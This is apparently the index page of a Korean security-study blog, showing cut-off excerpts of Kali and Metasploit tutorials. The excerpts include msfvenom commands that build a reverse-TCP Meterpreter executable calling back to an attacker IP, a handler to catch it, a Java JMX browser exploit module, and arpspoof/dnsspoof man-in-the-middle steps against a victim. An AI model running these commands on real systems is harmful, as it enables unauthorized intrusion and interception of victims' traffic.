๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
article thumbnail
netdiscover tutorial :)
Security Study/Network 2016. 12. 26. 19:41

netdiscover ๊ฐ™์€ ๊ฒฝ์šฐ์—๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ backtrack 5 ๋‚˜ kali ์— ์žˆ๋Š” network tool์ด๋‹ค. netdiscover์€ active / passive scanner์ด๋‹ค. ์‚ฌ์šฉ๋ฐฉ๋ฒ•์„ ํ•œ๋ฒˆ ์•Œ์•„๋ณด์ž . ๊ธฐ๋ณธ์ ์œผ๋กœ netdiscover ๋งŒ ์ž…๋ ฅํ•ด๋„ ์ด๋ ‡๊ฒŒ ๋œจ๋Š” ๊ฒƒ์„ ์•Œ์ˆ˜์žˆ๋‹ค. ์ข€๋” ๊ตฌ์ฒด์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๊ธฐ์œ„ํ•ด netdiscover -h ๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ๋„์›€๋ง์ด๋‚˜์˜ค๋Š”๋ฐ -r ์˜ต์…˜์„ ์ด์šฉํ•˜์—ฌ ๋Œ€์—ญ๋Œ€๋ฅผ ์„ค์ •ํ•ด์ค„์ˆ˜๋„ ์žˆ๋‹ค.

article thumbnail
Hack windows XP with armitage in kali
Metasploit 2016. 12. 23. 22:54

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ service postgresql start ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰์‹œํ‚จ ํ›„ service metasploit start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ armitage๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค. ์ด๋Ÿฌํ•œ ์ฐฝ์„ ๋ณผ์ˆ˜์žˆ์„ ํ…๋ฐ connect๋ฅผ ๋ˆ„๋ฅด๊ณ  yes๋ฅผ ๋ˆ„๋ฅด๊ณ  ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์Œ~~ ์Œ~~~ ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋œฌ๋‹ค. tab์ฐฝ์—์„œ hosts -> add hosts ๋ฅผ ๋ˆ„๋ฅด๋ฉด ์ด๋ ‡๊ฒŒ victim IP๋ฅผ ์ž…๋ ฅํ•  ์ˆ˜์žˆ๋„๋ก ๋œฌ๋‹ค. ๋“ฑ๋กํ›„ OS ๋ฅผ ์•Œ์•„๋ณด์ž ๋‹ค์‹œ host ํƒญ์—์„œ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ•˜๊ณ  yes ๊ทธ๋Ÿผ ์ฝ˜์†”์ฐฝ์— ์ด๋Ÿฌํ•œ ๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค. ์ด์ œ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•ด ์–ด๋– ํ•œ..

article thumbnail
Kali Linux by pass - Hack Windows metasploit tutorial
Metasploit 2016. 12. 22. 18:48

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์›ํ•˜๋Š” ํฌํŠธ] -f exe > filename.exe ๊ทธ๋Ÿผ /root ํด๋”์— exeํŒŒ์ผ์ด ์ƒ๊ธด๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค.๊ทธ๋Ÿผ ๋‹ค์Œ์œผ๋กœ๋Š” ์ปจํŠธ๋กคํ•  ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ค์–ด๋ณด์ž. ๋จผ์ € msfconsole์„ ์ž…๋ ฅํ•œ๋‹ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์šฐ๋ฆฌ๊ฐ€ ํŒŒ์ผ์„ ๋งŒ๋“ค๋•Œ ์‚ฌ์šฉํ•œ payload]set LHOST [attacker ip]set LP..

article thumbnail
Hack windows with metasploit Java Applet JMX Remote Code Execution
Metasploit 2016. 12. 22. 03:39

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฐ๊ตฌ ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๋จผ์ € ํ•˜๊ธฐ์ „์— ๋ฆฌ๋ˆ…์Šค์—์„œ service apache2 startservice postgresql startservice metastploit start ๋ช…๋ น์–ด๋“ค์„ ์‹คํ–‰ ์‹œ์ผœ์ค€๋‹ค. ๊ทธ ํ›„ msfconsole์„ ํ•ด์ค€๋‹ค. ๊ทธ๋Ÿผ ์œ„์™€๊ฐ™์€ ์ฐฝ์ด ๋œฐ๊ฒƒ์ด๋‹ค. (๊ทธ๋ฆผ์€ ๋‹ค๋ฅผ ์ˆ˜ ์žˆ๋‹ค.) ๊ทธ ํ›„ ์šฐ๋ฆฌ๊ฐ€ ํ•ด์•ผํ•  ์ผ์€ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“œ๋Š” ์ผ์ด๋‹ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ๋‹ค์Œ ํ•ด์•ผ ํ•  ํ–‰๋™์œผ๋กœ show options ์„ ์ด์šฉํ•˜์—ฌ ์šฐ๋ฆฌ๊ฐ€ ์ •ํ•ด์ค˜์•ผํ•˜๋Š” ๊ฒƒ์„ ๋ณธ๋‹ค. ๋จผ์ € URIPATH ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ฒฝ๋กœ๋ฅผ ์ง€์ •ํ•ด์ค€๋‹ค. / ํ•ด๋„๋˜๊ณ  test๋ฅผ ํ•ด๋„๋œ๋‹ค. ์ง€์ •ํ•˜์ง€..

kali linux 2.0 apt-get
Metasploit/Kali & Backtrack 2015. 12. 10. 06:37

/etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free

article thumbnail
msf ์ด์šฉํ•˜๊ธฐ // beEF ์‚ฌ์šฉ๋ฒ•
Metasploit 2015. 12. 6. 22:37

msfconsole ์„ ์ด์šฉํ•˜์—ฌ ๋งŽ์€ ์ •๋ณด๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.์•ž์—์„œ ๋ณด์—ฌ์ค€ ์ •๋ณด๋“ค ๋ฟ์•„๋‹ˆ๋ผ ์ด๋ฉ”์ผ ์ฃผ์†Œ๊นŒ์ง€ ์•Œ์•„๋‚ผ์ˆ˜ ์žˆ๋‹ค. ํ•˜์ง€๋งŒ msf ์ž์ฒด๋Š” ๋ฏธ๊ตญ์— ์ค‘์ ์ด ๋˜์–ด ํ•œ๊ตญ ์ •๋ณด๋Š” ๋งŽ์ด ์—†๋‹ค๋Š” ์ ์ด๋‹ค... (์•…์˜์ ์ธ ํ–‰์œ„์˜ ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.) 1. use auxiliary/gather/search_email_collector 2. set domain [๋„๋ฉ”์ธ] 3. run BeEFBeEF๋Š” Browser Exploit Framework ๋กœ์จ ์‚ฌ์šฉ์ž PC์˜ ์ •๋ณด ์ˆ˜์ง‘๋ถ€ํ„ฐ ๊ณต๊ฒฉ๊นŒ์ง€ ๊ฐ€๋Šฅํ•œ ๋„๊ตฌ์ด๋‹ค. ์ฃผ๋กœ xss(ํฌ๋กœ์Šค ์‚ฌ์ดํŠธ์Šคํฌ๋ฆฝํŠธ)๊ณต๊ฒฉ ์ทจ์•ฝ์ ์„ ์ฐพ๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ์ด๋œ๋‹ค. ๊ทธ๋Ÿผ xss๋ž€ ๋ฌด์—‡์ผ๊นŒ? ์ด๋Š” ์›น์—์„œ ์‚ฌ์šฉํ•˜๋Š” ํด๋ผ์ด์–ธํŠธ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํ†ตํ•ด ํŠน์ •ํ•œ ํ–‰๋™์„ ์ผ์œผํ‚ค๋Š” ์ทจ์•ฝ์ ์„ ๋งํ•œ๋‹ค. beEF ์„ค์น˜!..

article thumbnail
Arp Spoofing & DNS Spoofing
Metasploit 2015. 12. 6. 18:41

Arp Spoofing ๊ทผ๊ฑฐ๋ฆฌ ํ†ต์‹ ๋ง์—์„œ Arp ๋ฅผ ์ด์šฉํ•˜์—ฌ ์ƒ๋Œ€๋ฐฉ์˜ ๋ฐ์ดํ„ฐ ํŒจํ‚ท์„ ์ค‘๊ฐ„์—์„œ ๊ฐ€๋กœ์ฑ„๋Š” ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ์„ ๋งํ•œ๋‹ค. DNS Spoofing ๋„๋ฉ”์ธ ๋„ค์ž„ ์‹œ์Šคํ…œ์—์„œ ์ „๋‹ฌ๋˜๋Š” IP ์ฃผ์†Œ๋ฅผ ๋ณ€์กฐํ•˜๊ฑฐ๋‚˜ ๋„๋ฉ”์ธ ๋„ค์ž„ ์‹œ์Šคํ…œ์˜ ์„œ๋ฒ„๋ฅผ ์žฅ์•…ํ•˜์—ฌ ์‚ฌ์šฉ์ž๊ฐ€ ์˜๋„ํ•˜์ง€ ์•Š์€ ์ฃผ์†Œ๋กœ ์ ‘์†ํ•˜๊ฒŒ ๋งŒ๋“œ๋Š” ๊ณต๊ฒฉ์ด๋‹ค. ์ฃผ์˜!! ์•…์˜์ ์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ์ฑ…์ž„์€ ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.. 1. service apache2 start ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•จ์œผ๋กœ apache2๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค. 2. arpspoof -i [interface] -t [victim IP] [gatewayIP] ์ด ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ arpspoofing์„ ํ•œ๋‹ค. 3. fragrouter -B1 ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ํฌํŠธํฌ์›Œ๋”ฉ์„ ํ•˜์—ฌ ์ค€๋‹ค. 4. dnsspoof -i [int..

728x90
๋ฐ˜์‘ํ˜•
profile on loading

Loading...